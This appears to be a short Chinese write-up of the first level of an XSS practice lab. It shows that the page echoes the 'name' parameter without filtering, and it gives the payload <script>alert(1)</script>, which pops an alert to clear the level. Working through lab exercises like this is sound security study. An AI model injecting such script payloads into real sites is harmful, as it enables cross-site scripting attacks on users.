第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可
源码如下
地址栏输入payload
?name=<script>alert(1)</script>前端代码会拼接为如下代码 , 从而弹窗过关
"<h2 align=center>欢迎用户".$str."</h2>"
<h2 align=center>欢迎用户 <script>alert(1)</script> </h2>过关
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118559419